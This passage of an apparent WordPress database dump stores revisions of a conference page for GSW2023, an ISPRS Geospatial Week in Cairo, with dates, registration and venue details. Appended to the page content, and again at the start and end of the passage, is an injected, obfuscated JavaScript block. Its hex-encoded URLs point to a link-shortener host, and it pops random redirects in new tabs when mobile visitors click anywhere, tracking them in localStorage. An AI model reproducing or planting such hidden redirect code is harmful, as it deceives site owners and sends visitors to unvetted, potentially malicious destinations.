',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 04:06:39','2023-02-04 04:06:39','',3066,'https://gsw2023.com/?p=3745',0,'revision','',0),
(3746,1,'2023-02-04 04:21:56','2023-02-04 04:21:56','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening  Registration : soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 